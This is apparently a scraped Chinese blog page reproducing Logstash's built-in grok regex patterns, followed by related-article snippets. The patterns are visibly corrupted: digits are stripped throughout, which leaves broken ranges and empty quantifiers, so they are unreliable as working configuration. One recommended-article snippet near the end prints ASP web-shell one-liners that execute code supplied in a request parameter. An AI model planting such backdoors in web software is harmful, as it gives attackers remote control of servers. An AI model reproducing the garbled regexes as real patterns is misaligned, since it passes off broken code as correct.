USERNAME [a-zA-Z0-._-]+

USER %{USERNAME}

INT (?:[+-]?(?:[-]+))

BASE10NUM (?<![-.+-])(?>[+-]?(?:(?:[-]+(?:\.[-]+)?)|(?:\.[-]+)))

NUMBER (?:%{BASE10NUM})

BASE16NUM (?<![-9A-Fa-f])(?:[+-]?(?:0x)?(?:[-9A-Fa-f]+))

BASE16FLOAT \b(?<![-9A-Fa-f.])(?:[+-]?(?:0x)?(?:(?:[-9A-Fa-f]+(?:\.[-9A-Fa-f]*)?)|(?:\.[-9A-Fa-f]+)))\b

POSINT \b(?:[-][-]*)\b

NONNEGINT \b(?:[-]+)\b

WORD \b\w+\b

NOTSPACE \S+

SPACE \s*

DATA .*?

GREEDYDATA .*

QUOTEDSTRING (?>(?<!\\)(?>”(?>\\.|[^\\"]+)+”|”"|(?>’(?>\\.|[^\\']+)+’)|”|(?>(?>\\.|[^\]+)+)|`))

UUID [A-Fa-f0-]{}-(?:[A-Fa-f0-]{}-){}[A-Fa-f0-]{}

# Networking

MAC (?:%{CISCOMAC}|%{WINDOWSMAC}|%{COMMONMAC})

CISCOMAC (?:(?:[A-Fa-f0-]{}\.){}[A-Fa-f0-]{})

WINDOWSMAC (?:(?:[A-Fa-f0-]{}-){}[A-Fa-f0-]{})

COMMONMAC (?:(?:[A-Fa-f0-]{}:){}[A-Fa-f0-]{})

IPV6 ((([-9A-Fa-f]{,}:){}([-9A-Fa-f]{,}|:))|(([-9A-Fa-f]{,}:){}(:[-9A-Fa-f]{,}|(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){})|:))|(([-9A-Fa-f]{,}:){}(((:[-9A-Fa-f]{,}){,})|:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){})|:))|(([-9A-Fa-f]{,}:){}(((:[-9A-Fa-f]{,}){,})|((:[-9A-Fa-f]{,})?:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){}))|:))|(([-9A-Fa-f]{,}:){}(((:[-9A-Fa-f]{,}){,})|((:[-9A-Fa-f]{,}){,}:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){}))|:))|(([-9A-Fa-f]{,}:){}(((:[-9A-Fa-f]{,}){,})|((:[-9A-Fa-f]{,}){,}:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){}))|:))|(([-9A-Fa-f]{,}:){}(((:[-9A-Fa-f]{,}){,})|((:[-9A-Fa-f]{,}){,}:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){}))|:))|(:(((:[-9A-Fa-f]{,}){,})|((:[-9A-Fa-f]{,}){,}:(([-]|[-]\d|\d\d|[-]?\d)(\.([-]|[-]\d|\d\d|[-]?\d)){}))|:)))(%.+)?

IPV4 (?<![-])(?:(?:[-]|[-][-]|[-]?[-]{,})[.](?:[-]|[-][-]|[-]?[-]{,})[.](?:[-]|[-][-]|[-]?[-]{,})[.](?:[-]|[-][-]|[-]?[-]{,}))(?![-])

IP (?:%{IPV6}|%{IPV4})

HOSTNAME \b(?:[-9A-Za-z][-9A-Za-z-]{,})(?:\.(?:[-9A-Za-z][-9A-Za-z-]{,}))*(\.?|\b)

HOST %{HOSTNAME}

IPORHOST (?:%{HOSTNAME}|%{IP})

HOSTPORT (?:%{IPORHOST=~/\./}:%{POSINT})

# paths

PATH (?:%{UNIXPATH}|%{WINPATH})

UNIXPATH (?>/(?>[\w_%!$@:.,-]+|\\.)*)+

TTY (?:/dev/(pts|tty([pq])?)(\w+)?/?(?:[-]+))

WINPATH (?>[A-Za-z]+:|\\)(?:\

^\\?*]*)+

URIPROTO [A-Za-z]+(\+[A-Za-z+]+)?

URIHOST %{IPORHOST}(?::%{POSINT:port})?

# uripath comes loosely from RFC1738, but mostly from what Firefox

# doesn’t turn into %XX

URIPATH (?:/[A-Za-z0-$.+!*'(){},~:;=@#%_\-]*)+

#URIPARAM \?(?:[A-Za-z0-]+(?:=(?:[^&]*))?(?:&(?:[A-Za-z0-]+(?:=(?:[^&]*))?)?)*)?

URIPARAM \?[A-Za-z0-$.+!*’|(){},~@#%&/=:;_?\-\[

]*

URIPATHPARAM %{URIPATH}(?:%{URIPARAM})?

URI %{URIPROTO}://(?:%{USER}(?::[^@]*)?@)?(?:%{URIHOST})?(?:%{URIPATHPARAM})?

# Months: January, Feb, , , , December

MONTH \b(?:Jan(?:uary)?|Feb(?:ruary)?|Mar(?:ch)?|Apr(?:il)?|May|Jun(?:e)?|Jul(?:y)?|Aug(?:ust)?|Sep(?:tember)?|Oct(?:ober)?|Nov(?:ember)?|Dec(?:ember)?)\b

MONTHNUM (?:?[-]|[-])

MONTHDAY (?:(?:[-])|(?:[][-])|(?:[])|[-])

# Days: Monday, Tue, Thu, etc…

DAY (?:Mon(?:day)?|Tue(?:sday)?|Wed(?:nesday)?|Thu(?:rsday)?|Fri(?:day)?|Sat(?:urday)?|Sun(?:day)?)

# Years?

YEAR (?>\d\d){,}

HOUR (?:[]|[]?[-])

MINUTE (?:[-][-])

# ’′ is a leap second in most time standards and thus is valid.

SECOND (?:(?:[-][-]|)(?:[:.,][-]+)?)

TIME (?!<[-])%{HOUR}:%{MINUTE}(?::%{SECOND})(?![-])

# datestamp is YYYY/MM/DD-HH:MM:SS.UUUU (or something like it)

DATE_US %{MONTHNUM}[/-]%{MONTHDAY}[/-]%{YEAR}

DATE_EU %{MONTHDAY}[./-]%{MONTHNUM}[./-]%{YEAR}

ISO8601_TIMEZONE (?:Z|[+-]%{HOUR}(?::?%{MINUTE}))

ISO8601_SECOND (?:%{SECOND}|)

TIMESTAMP_ISO8601 %{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE}?

DATE %{DATE_US}|%{DATE_EU}

DATESTAMP %{DATE}[- ]%{TIME}

TZ (?:[PMCE][SD]T|UTC)

DATESTAMP_RFC822 %{DAY} %{MONTH} %{MONTHDAY} %{YEAR} %{TIME} %{TZ}

DATESTAMP_OTHER %{DAY} %{MONTH} %{MONTHDAY} %{TIME} %{TZ} %{YEAR}

# Syslog Dates: Month Day HH:MM:SS

SYSLOGTIMESTAMP %{MONTH} +%{MONTHDAY} %{TIME}

PROG (?:[\w._/%-]+)

SYSLOGPROG %{PROG:program}(?:

)?

SYSLOGHOST %{IPORHOST}

SYSLOGFACILITY <%{NONNEGINT:facility}.%{NONNEGINT:priority}>

HTTPDATE %{MONTHDAY}/%{MONTH}/%{YEAR}:%{TIME} %{INT}

# Shortcuts

QS %{QUOTEDSTRING}

# Log formats

SYSLOGBASE %{SYSLOGTIMESTAMP:timestamp} (?:%{SYSLOGFACILITY} )?%{SYSLOGHOST:logsource} %{SYSLOGPROG}:

COMMONAPACHELOG %{IPORHOST:clientip} %{USER:ident} %{USER:auth}

“(?:%{WORD:verb} %{NOTSPACE:request}(?: HTTP/%{NUMBER:httpversion})?|%{DATA:rawrequest})” %{NUMBER:response} (?:%{NUMBER:bytes}|-)

COMBINEDAPACHELOG %{COMMONAPACHELOG} %{QS:referrer} %{QS:agent}

# Log Levels

LOGLEVEL ([A-a]lert|ALERT|[T|t]race|TRACE|[D|d]ebug|DEBUG|[N|n]otice|NOTICE|[I|i]nfo|INFO|[W|w]arn?(?:ing)?|WARN?(?:ING)?|[E|e]rr?(?:or)?|ERR?(?:OR)?|[C|c]rit?(?:ical)?|CRIT?(?:ICAL)?|[F|f]atal|FATAL|[S|s]evere|SEVERE|EMERG(?:ENCY)?|[Ee]merg(?:ency)?)

Logstash自带正则表达式的更多相关文章

  1. iOS系统自带正则表达式简单运用

    //组装一个字符串,把里面的网址解析出来 NSString *urlString = @"sfdshttp://www.baidu.com"; NSError *error; // ...

  2. JavaScript实现带正则表达式的表单校验(校验成功后跳转)

    运行结果: 源代码: 1 <!DOCTYPE html> 2 <html lang="zh"> 3 <head> 4 <meta char ...

  3. Logstash使用grok过滤nginx日志(二)

    在生产环境中,nginx日志格式往往使用的是自定义的格式,我们需要把logstash中的message结构化后再存储,方便kibana的搜索和统计,因此需要对message进行解析. 本文采用grok ...

  4. logstash 配置文件语法

    需要一个配置文件 管理输入.过滤器和输出相关的配置.配置文件内容格式如下: # 输入 input { ... } # 过滤器 filter { ... } # 输出 output { ... } 先来 ...

  5. 论logstash的玩法(ELK)

    本篇文章采用的采用的是logstash-7.7.0版本,主要从如下几个方面介绍 1.logstash是什么,可以用来干啥 2.logstash的基本原理是什么 3.怎么去玩这个elk的组件logsta ...

  6. 浅尝 Elastic Stack (二) Logstash

    一.安装与启动 Logstash 依赖 Java 8 或者 Java 11,需要先安装 JDK 1.1 下载 curl -L -O https://artifacts.elastic.co/downl ...

  7. ELK技术栈之-Logstash详解

    ELK技术栈之-Logstash详解   前言 在第九章节中,我们已经安装好Logstash组件了,并且启动实例测试它的数据输入和输出,但是用的是最简单的控制台标准输入和标准输出,那这节我们就来深入的 ...

  8. 快速掌握grep命令及正则表达式

    Linux系统自带了支持拓展正则表达式的 GNU 版本 grep 工具,所有的Linux发行版中均默认安装grep ,grep 命令被用来检索一台服务器或工作站上任何位置的文本信息,如何在 Linux ...

  9. iOS之正则表达式的使用

    一.什么是正则表达式 正则表达式,又称正规表示法,是对字符串操作的一种逻辑公式.正则表达式可以检测给定的字符串是否符合我们定义的逻辑,也可以从字符串中获取我们想要的特定部分.它可以迅速地用极简单的方式 ...

随机推荐

  1. springmvc表单验证

    http://blog.csdn.net/daryl715/article/details/1645880 http://blog.csdn.net/shuwei003/article/details ...

  2. C# toolstrip 上添加DateTimePicker Control控件

    private void AddDTPtoToolstrip( n){DateTimePicker dtp = DateTimePicker;dtp.Width = 110;dtp.Format = ...

  3. [OpenCV] Samples 15: Background Subtraction and Gaussian mixture models

    不错的草稿.但进一步处理是必然的,也是难点所在. Extended: 固定摄像头,采用Gaussian mixture models对背景建模. OpenCV 中实现了两个版本的高斯混合背景/前景分割 ...

  4. Java -- 异常的捕获及处理 -- Java的异常处理机制

    7.1.4 Java的异常处理机制 在整个Java的异常处理中,实际上也是按照面向对象的方式进行处理,处理的步骤如下: ⑴ : 一旦产生异常,则首先会产生一个异常类的实例化对象. ⑵ : 在try语句 ...

  5. Java -- 新IO -- 目录

    20.1 Java 新IO简介 20.2 缓冲区与Buffer 例:演示缓冲区的操作流程 Class : IntBufferDemo01 20.2.2 深入缓冲区操作 20.2.3 创建子缓冲区 20 ...

  6. 8 -- 深入使用Spring -- 4...4 Spring 的 AOP 支持

    8.4.4 Spring 的AOP 支持 Spring中的AOP代理由Spring的IoC容器负责生成.管理,器依赖关系也由IoC容器负责管理.因此,AOP代理可以直接使用容器中的其他Bean实例作为 ...

  7. UITextField中文输入法输入时对字符长度的限制 输入时对字符类型的限制

    检索一个字符串的长度的话:直接用 length,去进行判断就行了, 如果要检索字符串是否是自己要限制的类型的话,可以用正则表达式: 举个例子:   匹配9-15个由字母/数字组成的字符串的正则表达式: ...

  8. python的输出问题

    我们知道python提供了一个shell来供初学者学习,在shell里是输入一句执行一句,例如:

  9. Spring4 Quartz2 动态任务,Spring4整合quartz2.2.3简单动态任务

     Spring4 Quartz2 动态任务 Spring4整合quartz2.2.3简单动态任务, Quartz2.2.3简单动态定时任务二, SimpleScheduleBuilder简单定时任务 ...

  10. 一句话木马:ASP篇

    ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%&g ...